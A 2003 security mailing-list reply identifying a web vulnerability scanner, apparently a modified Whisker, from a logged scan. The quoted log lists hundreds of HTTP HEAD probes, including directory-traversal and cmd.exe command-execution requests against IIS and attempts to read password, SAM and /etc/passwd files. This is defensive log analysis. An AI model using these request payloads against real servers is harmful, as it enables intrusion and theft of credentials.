Re: Does anyone recognize the scanner that causes this pattern ?

From: Gene (btraquerat_private)
Date: Sun Apr 06 2003 - 16:00:55 PDT
Next message: Joe Stewart: "ATD OpenSSL Mass Exploiter Analysis (another "/sumthin" scan tool)"
Previous message: deanat_private: "Re: Does anyone recognize the scanner that causes this pattern ?"
In reply to: deanat_private: "Does anyone recognize the scanner that causes this pattern ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Looks like a modified version of Whisker: 
 http://sourceforge.net/projects/whisker/

I say modified, because I don't recall that Whisker scanned for:

HEAD /girl/ HTTP/1.0\x0a\x0a
HEAD /girls/ HTTP/1.0\x0a\x0a
HEAD /sex/ HTTP/1.0\x0a\x0a

But then again, maybe I just never looked close enough at the results before.  Maybe someone else can correct me on this...

Thanks!
Gene




deanat_private wrote:

>I recently logged a fairly extensive web scan and am trying to ID the 
>tool responsible. Has anyone seen this particular pattern before ?
>
>HEAD /.html/............*/config.sys HTTP/1.0\x0a\x0a
>HEAD /.html/............./config.sys HTTP/1.0\x0a\x0a
>HEAD /.html/............/autoexec.bat HTTP/1.0\x0a\x0a
>HEAD /.jsp/WEB-INF/classes/Env.java HTTP/1.0\x0a\x0a
>HEAD /.nsf/../winnt/win.ini HTTP/1.0\x0a\x0a
>HEAD /../boot.ini HTTP/1.0\x0a\x0a
>HEAD /../config.sys HTTP/1.0\x0a\x0a
>HEAD /a.asp/..../..../winnt/repair/sam HTTP/1.0\x0a\x0a
>HEAD /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0\x0a\x0a
>HEAD /cgi HTTP/1.0\x0a\x0a
>HEAD /cgi/ HTTP/1.0\x0a\x0a
>HEAD /cgibin HTTP/1.0\x0a\x0a
>HEAD /cgi-bin HTTP/1.0\x0a\x0a
>HEAD /cgibin/ HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/../../../../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/......../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/............winntsystem32cmd.exe?/c+dir+c: HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/sam._ HTTP/1.0\x0a\x0a
>HEAD /cgi-win HTTP/1.0\x0a\x0a
>HEAD /cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
>HEAD /doc HTTP/1.0\x0a\x0a
>HEAD /iisadmin HTTP/1.0\x0a\x0a
>HEAD /iisadmin/ HTTP/1.0\x0a\x0a
>HEAD /iisamples/Sdk HTTP/1.0\x0a\x0a
>HEAD /iissamples HTTP/1.0\x0a\x0a
>HEAD /iissamples/Default HTTP/1.0\x0a\x0a
>HEAD /script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /scripts HTTP/1.0\x0a\x0a
>HEAD /scripts/ HTTP/1.0\x0a\x0a
>HEAD /scripts/* HTTP/1.0\x0a\x0a
>HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>\x0a\x0a
>HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /scripts/../../cmd.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /scripts/..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
>HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /scripts/cmd.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
>HEAD /scripts/iisadmin/default.htm HTTP/1.0\x0a\x0a
>HEAD /scripts/iisadmin/samples HTTP/1.0\x0a\x0a
>HEAD /scripts/iisadmin/tools HTTP/1.0\x0a\x0a
>HEAD /scripts/perl HTTP/1.0\x0a\x0a
>HEAD /scripts/samples HTTP/1.0\x0a\x0a
>HEAD /scripts/tools HTTP/1.0\x0a\x0a
>HEAD /search HTTP/1.0\x0a\x0a
>HEAD /server-info HTTP/1.0\x0a\x0a
>HEAD /server-status HTTP/1.0\x0a\x0a
>HEAD /_AuthChangeUrl HTTP/1.0\x0a\x0a
>HEAD /_AuthChangeUrl? HTTP/1.0\x0a\x0a
>HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /_private HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/_vti_adm HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/_vti_aut HTTP/1.0\x0a\x0a
>HEAD /_vti_bin HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/_vti_cnf HTTP/1.0\x0a\x0a
>HEAD /_vti_inf.html HTTP/1.0\x0a\x0a
>HEAD /_vti_log HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/ HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\x0a\x0a
>HEAD /_vti_txt HTTP/1.0\x0a\x0a
>HEAD /abczxv.htw HTTP/1.0\x0a\x0a
>HEAD /msadc/samples/adctest.asp HTTP/1.0\x0a\x0a
>HEAD /scripts/Carello/add.exe HTTP/1.0\x0a\x0a
>HEAD /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\x0a\x0a
>HEAD /_vti_adm/admin.dll HTTP/1.0\x0a\x0a
>HEAD /scripts/admin.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/administrator.pwd HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/administrators.pwd HTTP/1.0\x0a\x0a
>HEAD /session/adminlogin HTTP/1.0\x0a\x0a
>HEAD /admisapi/ HTTP/1.0\x0a\x0a
>HEAD /iissamples/exair/search/advsearch.asp HTTP/1.0\x0a\x0a
>HEAD /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%
>2Fetc&dispsize=640&start=0 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/alibaba.pl HTTP/1.0\x0a\x0a
>HEAD /app.cfm HTTP/1.0\x0a\x0a
>HEAD /cgi-dos/args.bat HTTP/1.0\x0a\x0a
>HEAD /cgi-dos/args.cmd HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/_vti_aut/author.dll HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/author.log HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/authors.pwd HTTP/1.0\x0a\x0a
>HEAD /autoexec.bat HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/bb-hostsvc.sh HTTP/1.0\x0a\x0a
>HEAD /scripts/bbs.pl%3F+.htr HTTP/1.0\x0a\x0a
>HEAD /bdir.htr HTTP/1.0\x0a\x0a
>HEAD /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\x0a\x0a
>HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>\x0a\x0a
>HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /common/browser.inc HTTP/1.0\x0a\x0a
>HEAD /scripts/c32web.exe HTTP/1.0\x0a\x0a
>HEAD /carbo.dll HTTP/1.0\x0a\x0a
>HEAD /scripts/Carello/Carello.dll HTTP/1.0\x0a\x0a
>HEAD /scripts/cart32.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/cart32.exe/cart32clientlist HTTP/1.0\x0a\x0a
>HEAD /catalog.nsf HTTP/1.0\x0a\x0a
>HEAD /catalog.nsf/ HTTP/1.0\x0a\x0a
>HEAD /AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a
>HEAD /ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a
>HEAD /WebShop/logs/cc.txt HTTP/1.0\x0a\x0a
>HEAD /WebShop/templates/cc.txt HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ceilidh.exe HTTP/1.0\x0a\x0a
>HEAD /cfcache.map HTTP/1.0\x0a\x0a
>HEAD /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\x0a\x0a
>HEAD /cfusion/database/cfsnippets.mdb HTTP/1.0\x0a\x0a
>HEAD /scripts/cgimail.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/CGImail.exe HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/cgitest.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/changepw.exe HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/c32web.exe/CheckError?error=53 HTTP/1.0\x0a\x0a
>HEAD /config/checks.txt HTTP/1.0\x0a\x0a
>HEAD /WebShop/logs/ck.log HTTP/1.0\x0a\x0a
>HEAD /msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
>\x0a\x0a
>HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
>HEAD /msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
>HEAD /msadc/msadcs.dll HTTP/1.0\x0a\x0a
>HEAD /scripts/tools/newdsn.exe HTTP/1.0\x0a\x0a
>HEAD /nofile.pl HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/shtml.dll/nosuch.htm HTTP/1.0\x0a\x0a
>HEAD /scripts/no-such-file.pl HTTP/1.0\x0a\x0a
>HEAD /cfdocs/expelval/openfile.cfm HTTP/1.0\x0a\x0a
>HEAD /cfdocs/expeval/openfile.cfm HTTP/1.0\x0a\x0a
>HEAD /Admin_files/order.log HTTP/1.0\x0a\x0a
>HEAD /_private/orders.txt HTTP/1.0\x0a\x0a
>HEAD /config/orders.txt HTTP/1.0\x0a\x0a
>HEAD /wwwboard/passwd.txt HTTP/1.0\x0a\x0a
>HEAD /pbserver/ HTTP/1.0\x0a\x0a
>HEAD /pbserver/pbserver.dll HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/perl.exe HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/scripts/perl.exe HTTP/1.0\x0a\x0a
>HEAD /cgi-win/perl.exe HTTP/1.0\x0a\x0a
>HEAD /ows-bin/perlidlc.bat?&dir HTTP/1.0\x0a\x0a
>HEAD /scripts/pfieffer.bat HTTP/1.0\x0a\x0a
>HEAD /scripts/pfieffer.cmd HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/post32.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/postinfo.asp HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ppdscgi.exe HTTP/1.0\x0a\x0a
>HEAD /private HTTP/1.0\x0a\x0a
>HEAD /process_bug.cgi HTTP/1.0\x0a\x0a
>HEAD /iissamples/iissamples/query.asp HTTP/1.0\x0a\x0a
>HEAD /iissamples/issamples/query.asp HTTP/1.0\x0a\x0a
>HEAD /samples/search/queryhit.htm HTTP/1.0\x0a\x0a
>HEAD /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\x0a\x0a
>HEAD /cfusion/cfapps/security/realm_.mdb HTTP/1.0\x0a\x0a
>HEAD /scripts/emurl/RECMAN.dll HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/redirect.exe HTTP/1.0\x0a\x0a
>HEAD /_private/register.txt HTTP/1.0\x0a\x0a
>HEAD /_private/registrations.txt HTTP/1.0\x0a\x0a
>HEAD /scripts/repost.asp HTTP/1.0\x0a\x0a
>HEAD /bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/rguest.exe HTTP/1.0\x0a\x0a
>HEAD /scripts/rguest.exe HTTP/1.0\x0a\x0a
>HEAD /robots.txt HTTP/1.0\x0a\x0a
>HEAD /cfdocs/root.cfm HTTP/1.0\x0a\x0a
>HEAD /scripts/root.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
>HEAD /sample.asp HTTP/1.0\x0a\x0a
>HEAD /IISSAMPLES/ExAir/Search/search.asp HTTP/1.0\x0a\x0a
>HEAD /search.dll HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/search97.vts HTTP/1.0\x0a\x0a
>HEAD /search97.vts HTTP/1.0\x0a\x0a
>HEAD /cfdocs/expeval/sendmail.cfm HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/service.grp HTTP/1.0\x0a\x0a
>HEAD /cfdocs/expelval/sendmail.cfm HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/service.pwd HTTP/1.0\x0a\x0a
>HEAD /servlet/SessionServlet HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/shop.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/shopper.cgi HTTP/1.0\x0a\x0a
>HEAD /_private/shopping_cart.mdb HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/c32web.exe/ShowAdminDir HTTP/1.0\x0a\x0a
>HEAD /iissamples/exair/howitworks/showcode.asp HTTP/1.0\x0a\x0a
>HEAD /msadc/samples/selector/showcode.asp HTTP/1.0\x0a\x0a
>HEAD /msadc/samples/selector/showcode.asp_2 HTTP/1.0\x0a\x0a
>HEAD /showfile.asp HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/shtml.dll HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/shtml.dll HTTP/1.0\x0a\x0a
>HEAD /_vti_bin/shtml.exe HTTP/1.0\x0a\x0a
>HEAD /_vti_pvt/shtml.exe HTTP/1.0\x0a\x0a
>HEAD /ex/jsp/simple.jsp. HTTP/1.0\x0a\x0a
>HEAD /adsamples/config/site.csc HTTP/1.0\x0a\x0a
>HEAD /scripts/slxweb.dll HTTP/1.0\x0a\x0a
>HEAD /smdata.dat HTTP/1.0\x0a\x0a
>HEAD /cfusion/database/smpolicy.mdb HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/snorkerz.bat HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/snorkerz.cmd HTTP/1.0\x0a\x0a
>HEAD /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\x0a\x0a
>HEAD /srchadm HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/statsconfig.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/test.bat HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/test.cgi HTTP/1.0\x0a\x0a
>HEAD /today.nsf HTTP/1.0\x0a\x0a
>HEAD /tree.dat HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/tst.bat HTTP/1.0\x0a\x0a
>HEAD /admin/ HTTP/1.0\x0a\x0a
>HEAD /administrator/ HTTP/1.0\x0a\x0a
>HEAD /bbs/ HTTP/1.0\x0a\x0a
>HEAD /bbs/admin/ HTTP/1.0\x0a\x0a
>HEAD /bbs/admin/config/ HTTP/1.0\x0a\x0a
>HEAD /bbs/data/ HTTP/1.0\x0a\x0a
>HEAD /bbs/db/ HTTP/1.0\x0a\x0a
>HEAD /bbs/include/ HTTP/1.0\x0a\x0a
>HEAD /cache-stats/ HTTP/1.0\x0a\x0a
>HEAD /card/ HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/admin/admin HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/Board/db/ HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/campas HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/counterfiglet/nc/f HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/jj HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/perl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/query HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ssi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/wrap HTTP/1.0\x0a\x0a
>HEAD /config/ HTTP/1.0\x0a\x0a
>HEAD /customer/ HTTP/1.0\x0a\x0a
>HEAD /data/ HTTP/1.0\x0a\x0a
>HEAD /database/ HTTP/1.0\x0a\x0a
>HEAD /databases/ HTTP/1.0\x0a\x0a
>HEAD /db/ HTTP/1.0\x0a\x0a
>HEAD /dbase/ HTTP/1.0\x0a\x0a
>HEAD /deny/ HTTP/1.0\x0a\x0a
>HEAD /devel/ HTTP/1.0\x0a\x0a
>HEAD /docs/ HTTP/1.0\x0a\x0a
>HEAD /document/ HTTP/1.0\x0a\x0a
>HEAD /documents/ HTTP/1.0\x0a\x0a
>HEAD /down/ HTTP/1.0\x0a\x0a
>HEAD /download/ HTTP/1.0\x0a\x0a
>HEAD /downloads/ HTTP/1.0\x0a\x0a
>HEAD /example/ HTTP/1.0\x0a\x0a
>HEAD /exec/show/config/cr HTTP/1.0\x0a\x0a
>HEAD /file/ HTTP/1.0\x0a\x0a
>HEAD /files/ HTTP/1.0\x0a\x0a
>HEAD /forum/ HTTP/1.0\x0a\x0a
>HEAD /ftp/ HTTP/1.0\x0a\x0a
>HEAD /girl/ HTTP/1.0\x0a\x0a
>HEAD /girls/ HTTP/1.0\x0a\x0a
>HEAD /hire/ HTTP/1.0\x0a\x0a
>HEAD /htdocs/ HTTP/1.0\x0a\x0a
>HEAD /idea/ HTTP/1.0\x0a\x0a
>HEAD /ideas/ HTTP/1.0\x0a\x0a
>HEAD /image/ HTTP/1.0\x0a\x0a
>HEAD /images/ HTTP/1.0\x0a\x0a
>HEAD /img/ HTTP/1.0\x0a\x0a
>HEAD /inc/ HTTP/1.0\x0a\x0a
>HEAD /include/ HTTP/1.0\x0a\x0a
>HEAD /include/inc/ HTTP/1.0\x0a\x0a
>HEAD /includes/ HTTP/1.0\x0a\x0a
>HEAD /incoming/ HTTP/1.0\x0a\x0a
>HEAD /install/ HTTP/1.0\x0a\x0a
>HEAD /lib/ HTTP/1.0\x0a\x0a
>HEAD /library/ HTTP/1.0\x0a\x0a
>HEAD /linux/ HTTP/1.0\x0a\x0a
>HEAD /logging/ HTTP/1.0\x0a\x0a
>HEAD /manual/ HTTP/1.0\x0a\x0a
>HEAD /misc/ HTTP/1.0\x0a\x0a
>HEAD /mp3/ HTTP/1.0\x0a\x0a
>HEAD /mrtg/ HTTP/1.0\x0a\x0a
>HEAD /msql/ HTTP/1.0\x0a\x0a
>HEAD /mysql/ HTTP/1.0\x0a\x0a
>HEAD /number/ HTTP/1.0\x0a\x0a
>HEAD /pds/ HTTP/1.0\x0a\x0a
>HEAD /perl HTTP/1.0\x0a\x0a
>HEAD /phone/ HTTP/1.0\x0a\x0a
>HEAD /php/ HTTP/1.0\x0a\x0a
>HEAD /php3/ HTTP/1.0\x0a\x0a
>HEAD /php4/ HTTP/1.0\x0a\x0a
>HEAD /porno/ HTTP/1.0\x0a\x0a
>HEAD /ports/ HTTP/1.0\x0a\x0a
>HEAD /private/ HTTP/1.0\x0a\x0a
>HEAD /program/ HTTP/1.0\x0a\x0a
>HEAD /programming/ HTTP/1.0\x0a\x0a
>HEAD /programs/ HTTP/1.0\x0a\x0a
>HEAD /public/ HTTP/1.0\x0a\x0a
>HEAD /secret/ HTTP/1.0\x0a\x0a
>HEAD /secrets/ HTTP/1.0\x0a\x0a
>HEAD /server_stats/ HTTP/1.0\x0a\x0a
>HEAD /server-info/ HTTP/1.0\x0a\x0a
>HEAD /server-status/ HTTP/1.0\x0a\x0a
>HEAD /set/ HTTP/1.0\x0a\x0a
>HEAD /setting/ HTTP/1.0\x0a\x0a
>HEAD /setup/ HTTP/1.0\x0a\x0a
>HEAD /sex/ HTTP/1.0\x0a\x0a
>HEAD /snmp/ HTTP/1.0\x0a\x0a
>HEAD /source/ HTTP/1.0\x0a\x0a
>HEAD /sources/ HTTP/1.0\x0a\x0a
>HEAD /sql/ HTTP/1.0\x0a\x0a
>HEAD /stat/ HTTP/1.0\x0a\x0a
>HEAD /statistics/ HTTP/1.0\x0a\x0a
>HEAD /Stats/ HTTP/1.0\x0a\x0a
>HEAD /stats/ HTTP/1.0\x0a\x0a
>HEAD /telephone/ HTTP/1.0\x0a\x0a
>HEAD /temp/ HTTP/1.0\x0a\x0a
>HEAD /temporary/ HTTP/1.0\x0a\x0a
>HEAD /test/ HTTP/1.0\x0a\x0a
>HEAD /tool/ HTTP/1.0\x0a\x0a
>HEAD /tools/ HTTP/1.0\x0a\x0a
>HEAD /usage/ HTTP/1.0\x0a\x0a
>HEAD /weblog/ HTTP/1.0\x0a\x0a
>HEAD /weblogs/ HTTP/1.0\x0a\x0a
>HEAD /webstats/ HTTP/1.0\x0a\x0a
>HEAD /work/ HTTP/1.0\x0a\x0a
>HEAD /wstats/ HTTP/1.0\x0a\x0a
>HEAD /wwwlog/ HTTP/1.0\x0a\x0a
>HEAD /wwwstats/ HTTP/1.0\x0a\x0a
>HEAD /acid/ HTTP/1.0\x0a\x0a
>HEAD /acid/acid_main.php HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ad.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/adcycle HTTP/1.0\x0a\x0a
>HEAD /secret/secret/add-user.shmtl HTTP/1.0\x0a\x0a
>HEAD /admin.php3?admin=anything HTTP/1.0\x0a\x0a
>HEAD /adpassword.txt HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/aglimpse HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/allmanage.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/allmanageup.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/amlite/amadmin.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/anacondaclip.pl?template=check HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/AnyForm2 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/AT-admin.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/AT-generate.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/awl/auctionweaver.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/auktion.pl HTTP/1.0\x0a\x0a
>HEAD /banners.php?op=Change HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/bb-hist.sh HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0\x0a\x0a
>HEAD /examples/applications/bboard/bboard_frames.html HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/bnbform.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/build.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/cached_feed.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/cachemgr.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/cal_make.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/calender.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/calender_admin.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/s.cgi?q=a&tmpl=check HTTP/1.0\x0a\x0a
>HEAD /cgi-bin-sdb HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/cgiforum.pl HTTP/1.0\x0a\x0a
>HEAD /manage/cgi/cgiproc HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/cgiwrap HTTP/1.0\x0a\x0a
>HEAD /secret/secret/change-passwd.shtml HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/changepw.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/classifieds.cgi HTTP/1.0\x0a\x0a
>HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd 
>HTTP/1.0\x0a\x0a
>HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server HTTP/1.0
>\x0a\x0a
>HEAD /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini HTTP/1.0
>\x0a\x0a
>HEAD /caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC HTTP/1.0
>\x0a\x0a
>HEAD /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 HTTP/1.0
>\x0a\x0a
>HEAD /servlet/com.livesoftware.jrun.plugins.jsp.JSP HTTP/1.0\x0a\x0a
>HEAD /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.0\x0a\x0a
>HEAD /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/commerce.cgi?page=check HTTP/1.0\x0a\x0a
>HEAD /forum/common.php HTTP/1.0\x0a\x0a
>HEAD /phorum/common.php HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/Count.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/CrazyWWWBoard.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/csvform.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/htgrep HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/htmlscript HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/htsearch HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/htsearch?config=aaa HTTP/1.0\x0a\x0a
>HEAD /index.html.bak HTTP/1.0\x0a\x0a
>HEAD /index.html~ HTTP/1.0\x0a\x0a
>HEAD /index.js%2570 HTTP/1.0\x0a\x0a
>HEAD /index.php.bak HTTP/1.0\x0a\x0a
>HEAD /index.php~ HTTP/1.0\x0a\x0a
>HEAD /index.php3?vhosts[test]= HTTP/1.0\x0a\x0a
>HEAD /adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/info2www HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/infosrch.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/lasso.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/loadpage.cgi HTTP/1.0\x0a\x0a
>HEAD /ConsoleHelp/login.jsp HTTP/1.0\x0a\x0a
>HEAD /login.jsp HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/mailfile.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/mailform.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/maillist.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/mailnews.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/mailto.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/man.sh HTTP/1.0\x0a\x0a
>HEAD /manual.php HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/mdma.bat HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= HTTP/1.0\x0a\x0a
>HEAD /class/mysql.class HTTP/1.0\x0a\x0a
>HEAD /names.nsf HTTP/1.0\x0a\x0a
>HEAD /ncl_items.html?SUBJECT=2097 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/netauth.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/news/news.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/nph-maillist.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/nph-publish HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/nph-test-cgi HTTP/1.0\x0a\x0a
>HEAD /examples/jsp/num/numguess.js%70 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/pagelog.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/pals-cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0\x0a\x0a
>HEAD /opendir.php?requesturl=/etc/passwd HTTP/1.0\x0a\x0a
